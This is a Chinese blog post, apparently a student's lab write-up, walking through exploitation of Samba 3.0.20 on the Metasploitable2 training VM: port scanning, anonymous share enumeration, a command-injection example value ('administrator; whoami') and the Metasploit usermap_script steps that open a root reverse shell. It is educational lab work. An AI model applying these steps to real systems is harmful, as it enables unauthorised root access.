<!DOCTYPE html><html lang="zh-CN"> <head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="description" content="Samba 3.0.20 Username Map Script 命令注入漏洞：从端口扫描、服务枚举、漏洞筛选到获得 Root Shell 的完整渗透流程。"><meta property="og:title" content="Metasploitable2 渗透学习（三）—— Samba 服务枚举、漏洞分析与第一次获得 Root Shell | PeterYang"><meta property="og:description" content="Samba 3.0.20 Username Map Script 命令注入漏洞：从端口扫描、服务枚举、漏洞筛选到获得 Root Shell 的完整渗透流程。"><meta property="og:image" content="/avatar.jpg"><meta property="og:type" content="website"><title>Metasploitable2 渗透学习（三）—— Samba 服务枚举、漏洞分析与第一次获得 Root Shell | PeterYang</title><link rel="preconnect" href="https://fonts.googleapis.com"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&family=Noto+Sans+SC:wght@400;500;600;700&display=swap" rel="stylesheet"><link rel="stylesheet" href="/_astro/archive.Dw7fWL3R.css">
<style>.meta[data-astro-cid-gysqo7gh]{display:flex;align-items:center;gap:8px;flex-wrap:wrap;margin-bottom:20px;font-size:14px;color:var(--text-tertiary)}.tag[data-astro-cid-gysqo7gh]{font-size:11px;padding:2px 9px;border-radius:9999px;background:#007aff1a;color:var(--blue);font-weight:540}.toc[data-astro-cid-gysqo7gh]{background:#00000005;border-radius:12px;padding:16px 20px;margin:20px 0 28px}html[data-theme=dark] .toc[data-astro-cid-gysqo7gh]{background:#ffffff08}.toc-title[data-astro-cid-gysqo7gh]{font-size:14px;font-weight:620;margin-bottom:8px;color:var(--text)}.toc[data-astro-cid-gysqo7gh] ul[data-astro-cid-gysqo7gh]{list-style:none;padding:0;margin:0}.toc[data-astro-cid-gysqo7gh] li[data-astro-cid-gysqo7gh]{margin:4px 0}.toc[data-astro-cid-gysqo7gh] a[data-astro-cid-gysqo7gh]{font-size:14px;color:var(--blue);text-decoration:none}.toc[data-astro-cid-gysqo7gh] a[data-astro-cid-gysqo7gh]:hover{opacity:.65}.toc-h3[data-astro-cid-gysqo7gh]{padding-left:16px}.series-nav[data-astro-cid-gysqo7gh]{margin-top:40px;padding-top:24px;border-top:.5px solid rgba(0,0,0,.06)}html[data-theme=dark] .series-nav[data-astro-cid-gysqo7gh]{border-top-color:#ffffff0f}.series-title[data-astro-cid-gysqo7gh]{font-size:14px;font-weight:620;color:var(--text);margin-bottom:12px}.series-links[data-astro-cid-gysqo7gh]{display:flex;gap:12px}.series-prev[data-astro-cid-gysqo7gh],.series-next[data-astro-cid-gysqo7gh]{flex:1;display:flex;flex-direction:column;gap:4px;padding:14px 16px;border-radius:12px;background:#00000005;text-decoration:none;transition:background .2s}html[data-theme=dark] .series-prev[data-astro-cid-gysqo7gh],html[data-theme=dark] .series-next[data-astro-cid-gysqo7gh]{background:#ffffff08}.series-prev[data-astro-cid-gysqo7gh]:hover,.series-next[data-astro-cid-gysqo7gh]:hover{background:#007aff0f}.series-label[data-astro-cid-gysqo7gh]{font-size:12px;color:var(--text-tertiary)}.series-name[data-astro-cid-gysqo7gh]{font-size:14px;font-weight:540;color:var(--blue);display:-webkit-box;-webkit-line-clamp:1;-webkit-box-orient:vertical;overflow:hidden}.series-next[data-astro-cid-gysqo7gh]{text-align:right}@media(max-width:640px){.series-links[data-astro-cid-gysqo7gh]{flex-direction:column}}
</style></head> <body> <div class="bg-ambient bg-ambient-1"></div> <div class="bg-ambient bg-ambient-2"></div> <div class="bg-ambient bg-ambient-3"></div> <nav class="nav"> <a href="/" class="nav-brand">PeterYang</a> <div class="nav-right"> <ul class="nav-links"> <li><a href="/">Home</a></li> <li><a href="/archive/">Archive</a></li> <li><a href="/posts/about/">About</a></li> <li><a href="/posts/guestbook/">Guestbook</a></li> </ul> <button class="theme-toggle" id="theme-toggle" aria-label="Toggle theme"> <svg class="icon-moon" viewBox="0 0 24 24"><path d="M21 12.79A9 9 0 1 1 11.21 3 7 7 0 0 0 21 12.79z"></path></svg> <svg class="icon-sun" viewBox="0 0 24 24"><circle cx="12" cy="12" r="5"></circle><line x1="12" y1="1" x2="12" y2="3"></line><line x1="12" y1="21" x2="12" y2="23"></line><line x1="4.22" y1="4.22" x2="5.64" y2="5.64"></line><line x1="18.36" y1="18.36" x2="19.78" y2="19.78"></line><line x1="1" y1="12" x2="3" y2="12"></line><line x1="21" y1="12" x2="23" y2="12"></line><line x1="4.22" y1="19.78" x2="5.64" y2="18.36"></line><line x1="18.36" y1="5.64" x2="19.78" y2="4.22"></line></svg> </button> <button class="hamburger" id="hamburger" aria-label="Menu">☰</button> </div> </nav> <main class="container">  <article class="prose liquid-glass" data-astro-cid-gysqo7gh> <a class="back-link" href="/" data-astro-cid-gysqo7gh>&larr; Back</a> <h1 data-astro-cid-gysqo7gh>Metasploitable2 渗透学习（三）—— Samba 服务枚举、漏洞分析与第一次获得 Root Shell</h1> <div class="meta" data-astro-cid-gysqo7gh> <span class="date" data-astro-cid-gysqo7gh>2026-07-07</span> <span class="reading-time" data-astro-cid-gysqo7gh>· 3 min read</span> <span class="tag" data-astro-cid-gysqo7gh>Security</span><span class="tag" data-astro-cid-gysqo7gh>Metasploitable2</span> </div> <hr data-astro-cid-gysqo7gh> <nav class="toc" data-astro-cid-gysqo7gh> <p class="toc-title" data-astro-cid-gysqo7gh>Contents</p> <ul data-astro-cid-gysqo7gh> <li class data-astro-cid-gysqo7gh> <a href="#前言" data-astro-cid-gysqo7gh>前言</a> </li><li class data-astro-cid-gysqo7gh> <a href="#一端口扫描发现-samba-服务" data-astro-cid-gysqo7gh>一、端口扫描发现 Samba 服务</a> </li><li class data-astro-cid-gysqo7gh> <a href="#二枚举-samba-共享资源" data-astro-cid-gysqo7gh>二、枚举 Samba 共享资源</a> </li><li class data-astro-cid-gysqo7gh> <a href="#三搜索-samba-漏洞" data-astro-cid-gysqo7gh>三、搜索 Samba 漏洞</a> </li><li class="toc-h3" data-astro-cid-gysqo7gh> <a href="#-format-string" data-astro-cid-gysqo7gh>① Format String</a> </li><li class="toc-h3" data-astro-cid-gysqo7gh> <a href="#-username-map-script-command-execution" data-astro-cid-gysqo7gh>② Username Map Script Command Execution</a> </li><li class="toc-h3" data-astro-cid-gysqo7gh> <a href="#-heap-overflow" data-astro-cid-gysqo7gh>③ Heap Overflow</a> </li><li class="toc-h3" data-astro-cid-gysqo7gh> <a href="#-dos" data-astro-cid-gysqo7gh>④ DoS</a> </li><li class data-astro-cid-gysqo7gh> <a href="#四理解-username-map-script-漏洞原理" data-astro-cid-gysqo7gh>四、理解 Username Map Script 漏洞原理</a> </li><li class data-astro-cid-gysqo7gh> <a href="#五命令注入与-sql-注入" data-astro-cid-gysqo7gh>五、命令注入与 SQL 注入</a> </li><li class data-astro-cid-gysqo7gh> <a href="#六使用-metasploit" data-astro-cid-gysqo7gh>六、使用 Metasploit</a> </li><li class data-astro-cid-gysqo7gh> <a href="#七漏洞利用" data-astro-cid-gysqo7gh>七、漏洞利用</a> </li><li class data-astro-cid-gysqo7gh> <a href="#八为什么会得到-root-权限" data-astro-cid-gysqo7gh>八、为什么会得到 Root 权限？</a> </li><li class data-astro-cid-gysqo7gh> <a href="#九学习过程中的疑问" data-astro-cid-gysqo7gh>九、学习过程中的疑问</a> </li><li class data-astro-cid-gysqo7gh> <a href="#十今天最大的收获" data-astro-cid-gysqo7gh>十、今天最大的收获</a> </li><li class data-astro-cid-gysqo7gh> <a href="#总结" data-astro-cid-gysqo7gh>总结</a> </li> </ul> </nav> <h2 id="前言">前言</h2>
<p>今天继续学习 Metasploitable2 靶机。相比前两次学习的 vsFTPd 后门漏洞和 Telnet 服务，这次学习的内容更加系统，也让我第一次体验到了完整的渗透测试流程。</p>
<p>一开始我以为渗透测试就是扫描端口、搜索漏洞、运行 Metasploit，但真正学习之后才发现，每一步都有自己的目的，真正重要的是理解漏洞产生的原因，而不是简单地复制命令。</p>
<p>本文记录今天完整的学习过程以及自己的理解。</p>
<hr>
<h2 id="一端口扫描发现-samba-服务">一、端口扫描发现 Samba 服务</h2>
<p>首先使用 Nmap 对靶机进行扫描。</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#89B4FA;font-style:italic">nmap</span><span style="color:#A6E3A1"> -sV</span><span style="color:#FAB387"> 192.168.93.148</span></span></code></pre>
<p>扫描结果发现：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>139/tcp open netbios-ssn Samba smbd</span></span>
<span class="line"><span>445/tcp open microsoft-ds Samba smbd</span></span></code></pre>
<p>看到 139 和 445 两个端口时，老师告诉我：</p>
<blockquote>
<p>在实际渗透过程中，看到 139、445 端口，第一反应就是怀疑目标运行了 Samba 服务。</p>
</blockquote>
<p>这里学到的不是命令，而是建立”端口 → 服务”之间的联系。</p>
<p>以后看到：</p>
<ul>
<li>21 —— FTP</li>
<li>22 —— SSH</li>
<li>23 —— Telnet</li>
<li>80 —— HTTP</li>
<li>139、445 —— Samba（SMB）</li>
</ul>
<p>应该能够迅速联想到对应的服务。</p>
<hr>
<h2 id="二枚举-samba-共享资源">二、枚举 Samba 共享资源</h2>
<p>知道目标运行 Samba 后，下一步不是立即攻击，而是先进行信息收集。</p>
<p>使用 smbclient 查看共享目录：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#89B4FA;font-style:italic">smbclient</span><span style="color:#A6E3A1"> -L</span><span style="color:#FAB387"> 192.168.93.148</span></span></code></pre>
<p>输出如下：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>Sharename</span></span>
<span class="line"><span>---------</span></span>
<span class="line"><span>print$</span></span>
<span class="line"><span>tmp</span></span>
<span class="line"><span>opt</span></span>
<span class="line"><span>IPC$</span></span>
<span class="line"><span>ADMIN$</span></span></code></pre>
<p>这里最重要的是：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>Anonymous login successful</span></span></code></pre>
<p>说明：</p>
<p><strong>目标允许匿名访问。</strong></p>
<p>虽然匿名访问并不一定意味着存在漏洞，但说明服务器配置存在一定安全风险，同时也方便攻击者进一步枚举信息。</p>
<p>随后继续连接共享目录：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#89B4FA;font-style:italic">smbclient</span><span style="color:#A6E3A1"> //192.168.93.148/tmp</span></span></code></pre>
<p>进入后执行：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#89B4FA;font-style:italic">ls</span></span></code></pre>
<p>成功查看到了共享目录中的文件。</p>
<p>虽然里面没有特别有价值的数据，但这一步让我第一次真正体验了 SMB 文件共享的访问过程。</p>
<hr>
<h2 id="三搜索-samba-漏洞">三、搜索 Samba 漏洞</h2>
<p>接下来开始根据版本搜索漏洞。</p>
<p>首先确定版本：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>Samba 3.0.20</span></span></code></pre>
<p>然后使用：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#89B4FA;font-style:italic">searchsploit</span><span style="color:#A6E3A1"> Samba</span><span style="color:#FAB387"> 3.0.20</span></span></code></pre>
<p>得到四个漏洞：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>Format String</span></span>
<span class="line"><span>Username Map Script Command Execution</span></span>
<span class="line"><span>Heap Overflow</span></span>
<span class="line"><span>Denial of Service</span></span></code></pre>
<p>刚开始我以为四个漏洞都可以尝试。</p>
<p>老师告诉我：</p>
<p>真正的渗透测试不是”全部打一遍”，而是分析漏洞是否适合当前目标。</p>
<p>于是逐个分析：</p>
<h3 id="-format-string">① Format String</h3>
<p>属于格式化字符串漏洞。</p>
<p>利用复杂。</p>
<p>暂时不适合作为入门学习。</p>
<h3 id="-username-map-script-command-execution">② Username Map Script Command Execution</h3>
<p>看到最后三个单词：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>Command Execution</span></span></code></pre>
<p>老师立刻告诉我：</p>
<p>这意味着：</p>
<p><strong>远程命令执行（RCE）</strong></p>
<p>并且版本：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>3.0.20 &#x3C; 3.0.25</span></span></code></pre>
<p>与当前靶机完全匹配。</p>
<p>最终确定：</p>
<p>这就是今天要学习的漏洞。</p>
<h3 id="-heap-overflow">③ Heap Overflow</h3>
<p>属于堆溢出漏洞。</p>
<p>涉及内存布局、Shellcode 等知识。</p>
<p>学习成本较高。</p>
<p>暂时放在以后学习。</p>
<h3 id="-dos">④ DoS</h3>
<p>拒绝服务攻击。</p>
<p>只能让服务崩溃。</p>
<p>不能获得 Shell。</p>
<p>不符合今天学习目标。</p>
<p>这里老师告诉我一个非常重要的经验：</p>
<p>以后使用 Searchsploit 时，优先关注：</p>
<ul>
<li>Command Execution</li>
<li>Remote Code Execution</li>
<li>Authentication Bypass</li>
</ul>
<p>而不是看到漏洞就全部尝试。</p>
<hr>
<h2 id="四理解-username-map-script-漏洞原理">四、理解 Username Map Script 漏洞原理</h2>
<p>这是今天我认为最重要的一部分。</p>
<p>老师没有直接讲源码，而是举了一个生活中的例子。</p>
<p>Samba 有一个功能：</p>
<p>Username Map Script（用户名映射脚本）。</p>
<p>本来设计目的是：</p>
<p>例如：</p>
<p>Windows 用户：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>administrator</span></span></code></pre>
<p>自动映射为 Linux：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>root</span></span></code></pre>
<p>于是程序执行：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#89B4FA;font-style:italic">username_map.sh</span><span style="color:#A6E3A1"> administrator</span></span></code></pre>
<p>正常情况下没有问题。</p>
<p>但是如果攻击者输入：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>administrator; whoami</span></span></code></pre>
<p>程序错误地把用户输入直接拼接到命令中：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#89B4FA;font-style:italic">username_map.sh</span><span style="color:#A6E3A1"> administrator</span><span style="color:#9399B2">;</span><span style="color:#89B4FA;font-style:italic"> whoami</span></span></code></pre>
<p>Linux Shell 会把它理解成两条命令：</p>
<p>第一条：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#89B4FA;font-style:italic">username_map.sh</span><span style="color:#A6E3A1"> administrator</span></span></code></pre>
<p>第二条：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#89B4FA;font-style:italic">whoami</span></span></code></pre>
<p>于是攻击者就成功让服务器执行了自己指定的命令。</p>
<p>老师告诉我：</p>
<p>这就是：</p>
<p><strong>命令注入（Command Injection）</strong></p>
<p>也是今天真正学习到的漏洞本质。</p>
<hr>
<h2 id="五命令注入与-sql-注入">五、命令注入与 SQL 注入</h2>
<p>这里我突然想到：</p>
<p>这种方式和 SQL 注入很像。</p>
<p>老师告诉我：</p>
<p>我的理解是正确的。</p>
<p>SQL 注入：</p>
<p>把用户输入拼接进 SQL。</p>
<p>例如：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="sql"><code><span class="line"><span style="color:#CBA6F7">SELECT</span><span style="color:#94E2D5"> *</span><span style="color:#CBA6F7"> FROM</span><span style="color:#CDD6F4"> users </span><span style="color:#CBA6F7">WHERE</span><span style="color:#CDD6F4"> username</span><span style="color:#94E2D5">=</span><span style="color:#A6E3A1">'输入'</span><span style="color:#CDD6F4">;</span></span></code></pre>
<p>命令注入：</p>
<p>把用户输入拼接进 Shell。</p>
<p>例如：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#89B4FA;font-style:italic">ping</span><span style="color:#A6E3A1"> 用户输入</span></span></code></pre>
<p>两者本质相同。</p>
<p>都是：</p>
<p><strong>程序错误地把用户输入当成程序的一部分执行。</strong></p>
<hr>
<h2 id="六使用-metasploit">六、使用 Metasploit</h2>
<p>接下来第一次真正使用 Metasploit。</p>
<p>进入：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#89B4FA;font-style:italic">msfconsole</span></span></code></pre>
<p>搜索 Samba：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#89B4FA;font-style:italic">search</span><span style="color:#A6E3A1"> samba</span></span></code></pre>
<p>找到：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>exploit/multi/samba/usermap_script</span></span></code></pre>
<p>看到：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>Rank: excellent</span></span></code></pre>
<p>老师告诉我：</p>
<p>Rank 表示漏洞利用模块的稳定程度。</p>
<p>excellent 代表成功率高，非常适合作为教学模块。</p>
<p>随后进入模块：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#89B4FA;font-style:italic">use</span><span style="color:#A6E3A1"> exploit/multi/samba/usermap_script</span></span></code></pre>
<p>查看参数：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#89B4FA;font-style:italic">show</span><span style="color:#A6E3A1"> options</span></span></code></pre>
<p>主要参数：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>RHOSTS — 目标主机</span></span>
<span class="line"><span>RPORT  — 目标端口</span></span>
<span class="line"><span>LHOST  — 攻击机 IP</span></span>
<span class="line"><span>LPORT  — 监听端口</span></span></code></pre>
<p>这里我第一次真正理解：</p>
<p>Payload 并不是漏洞。</p>
<p>漏洞负责进入系统。</p>
<p>Payload 决定进入系统以后执行什么。</p>
<hr>
<h2 id="七漏洞利用">七、漏洞利用</h2>
<p>设置目标：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#F38BA8;font-style:italic">set</span><span style="color:#A6E3A1"> RHOST</span><span style="color:#FAB387"> 192.168.93.148</span></span></code></pre>
<p>随后执行：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#89B4FA;font-style:italic">run</span></span></code></pre>
<p>出现：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>Command shell session 1 opened</span></span></code></pre>
<p>老师告诉我：</p>
<p>这一句话意味着：</p>
<p>攻击成功。</p>
<p>目标已经主动连接回 Kali。</p>
<p>建立 Reverse Shell。</p>
<p>随后执行：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#89B4FA;font-style:italic">whoami</span></span></code></pre>
<p>输出：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>root</span></span></code></pre>
<p>继续：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#89B4FA;font-style:italic">id</span></span></code></pre>
<p>输出：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>uid=0(root)</span></span></code></pre>
<p>最后：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#F38BA8;font-style:italic">pwd</span></span></code></pre>
<p>输出：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>/</span></span></code></pre>
<p>说明：</p>
<p>此次利用直接获得了 Root 权限。</p>
<p>整个过程没有输入用户名，也没有输入密码。</p>
<p>真正进入系统的是漏洞，而不是身份认证。</p>
<hr>
<h2 id="八为什么会得到-root-权限">八、为什么会得到 Root 权限？</h2>
<p>这是我今天最想知道的问题。</p>
<p>老师解释：</p>
<p>并不是所有漏洞都会得到 Root。</p>
<p>而是因为：</p>
<p>Samba 服务本身以 Root 身份运行。</p>
<p>漏洞触发以后：</p>
<p>执行命令的也是 Root。</p>
<p>因此最终获得：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>uid=0(root)</span></span></code></pre>
<p>如果漏洞运行在普通用户权限下：</p>
<p>那么攻击成功以后得到的也只是普通用户。</p>
<p>后续还需要进行提权。</p>
<p>因此：</p>
<p>RCE 的危害不仅在于能够执行命令，更重要的是命令最终以什么身份执行。</p>
<hr>
<h2 id="九学习过程中的疑问">九、学习过程中的疑问</h2>
<p>今天我最大的疑问是：</p>
<p>既然 Metasploit 已经帮我们完成了一切，那我到底学会了什么？</p>
<p>老师告诉我：</p>
<p>今天真正攻击成功的不是我。</p>
<p>而是：</p>
<p>Metasploit。</p>
<p>我只是正确使用了别人编写好的 Exploit。</p>
<p>真正高手的发展路线应该是：</p>
<p>会使用 Exploit → 会分析 Exploit → 会修改 Exploit → 能够自己编写 Exploit → 最终能够自己发现漏洞。</p>
<p>这也让我明白：</p>
<p>Metasploit 只是一个自动化工具。</p>
<p>真正重要的是理解漏洞原理。</p>
<hr>
<h2 id="十今天最大的收获">十、今天最大的收获</h2>
<p>今天最大的收获不是获得了 Root Shell。</p>
<p>而是建立了完整的渗透测试流程：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>Nmap 扫描 → 识别服务 → 版本分析 → 枚举信息 → 搜索漏洞 → 筛选漏洞 → 理解漏洞原理 → 使用 Metasploit → 验证漏洞 → 获得 Root Shell</span></span></code></pre>
<p>这也是我第一次真正理解：</p>
<p>渗透测试不是背命令，而是分析目标、理解漏洞、验证漏洞。</p>
<hr>
<h2 id="总结">总结</h2>
<p>今天完成了 Metasploitable2 中经典的 Samba 漏洞利用。</p>
<p>相比第一次学习时只会照着教程敲命令，现在已经能够分析为什么选择这个漏洞、为什么能够执行命令，以及为什么最终获得 Root 权限。</p>
<p>不过，我也意识到自己真正缺少的不是命令，而是底层原理。</p>
<p>下一步，我准备继续学习：</p>
<ul>
<li>Metasploit 模块源码分析</li>
<li>Exploit 的实现过程</li>
<li>SMB 协议基础</li>
<li>为什么一个数据包能够触发漏洞</li>
<li>如何不用 Metasploit，自行编写漏洞利用程序</li>
</ul>
<p>希望未来能够真正做到不仅会使用工具，更能够理解工具背后的原理。</p> <div class="series-nav" data-astro-cid-gysqo7gh> <p class="series-title" data-astro-cid-gysqo7gh>📖 metasploitable2 系列</p> <div class="series-links" data-astro-cid-gysqo7gh> <a class="series-prev" href="/posts/metasploitable2-telnet/" data-astro-cid-gysqo7gh> <span class="series-label" data-astro-cid-gysqo7gh>&larr; 上一篇</span> <span class="series-name" data-astro-cid-gysqo7gh>Metasploitable2 渗透学习（二）—— Telnet 服务分析与弱口令登录</span> </a> <div data-astro-cid-gysqo7gh></div> </div> </div> </article>  </main> <footer class="footer"> <div class="footer-links"> <a href="https://github.com/yangpeter26-bot" target="_blank" rel="noopener">GitHub</a> <a href="/rss.xml">RSS</a> <a href="https://mail.google.com/mail/?view=cm&to=yangpeter26@gmail.com" target="_blank">Email</a> </div> <p>&copy; 2026 PeterYang</p> </footer> <script>
      const saved = localStorage.getItem("theme");
      const prefersDark = window.matchMedia("(prefers-color-scheme: dark)").matches;
      document.documentElement.dataset.theme = saved || (prefersDark ? "dark" : "light");
      const btn = document.getElementById("theme-toggle");
      btn.addEventListener("click", () => {
        const next = document.documentElement.dataset.theme === "dark" ? "light" : "dark";
        document.documentElement.dataset.theme = next;
        localStorage.setItem("theme", next);
      });
      const hamburger = document.getElementById("hamburger");
      let mobileMenu = null;
      const links = [
        { href: "/", text: "Home" },
        { href: "/archive/", text: "Archive" },
        { href: "/posts/about/", text: "About" },
        { href: "/posts/guestbook/", text: "Guestbook" },
      ];
      hamburger.addEventListener("click", () => {
        if (!mobileMenu) {
          mobileMenu = document.createElement("div");
          mobileMenu.className = "mobile-menu open";
          mobileMenu.style.cssText = `
            position: fixed; top: 60px; left: 12px; right: 12px; z-index: 99;
            padding: 12px; display: flex; flex-direction: column; gap: 4px;
            background: rgba(232,234,237,0.4);
            backdrop-filter: blur(24px) saturate(140%);
            -webkit-backdrop-filter: blur(24px) saturate(140%);
            border: 0.5px solid rgba(255,255,255,0.2);
            border-radius: 20px;
            box-shadow: 0 4px 24px rgba(0,0,0,0.04);
          `;
          if (document.documentElement.dataset.theme === "dark") {
            mobileMenu.style.background = "rgba(26,26,46,0.4)";
          }
          links.forEach(l => {
            const a = document.createElement("a");
            a.href = l.href;
            a.textContent = l.text;
            a.style.cssText = `
              color: var(--blue); text-decoration: none; font-size: 15px;
              font-weight: 500; padding: 10px 16px; border-radius: 12px;
              transition: background 0.2s;
            `;
            a.addEventListener("mouseenter", () => a.style.background = "rgba(0,122,255,0.06)");
            a.addEventListener("mouseleave", () => a.style.background = "transparent");
            mobileMenu.appendChild(a);
          });
          document.querySelector(".nav").after(mobileMenu);
        } else {
          mobileMenu.classList.toggle("open");
          if (!mobileMenu.classList.contains("open")) {
            mobileMenu.remove();
            mobileMenu = null;
          }
        }
      });

      // Code copy buttons
      document.querySelectorAll(".prose pre").forEach((pre) => {
        const btn = document.createElement("button");
        btn.className = "copy-btn";
        btn.textContent = "Copy";
        btn.addEventListener("click", () => {
          const code = pre.querySelector("code")?.textContent || pre.textContent;
          navigator.clipboard.writeText(code).then(() => {
            btn.textContent = "Copied!";
            btn.classList.add("copied");
            setTimeout(() => { btn.textContent = "Copy"; btn.classList.remove("copied"); }, 2000);
          });
        });
        pre.appendChild(btn);
      });
    </script> </body> </html> 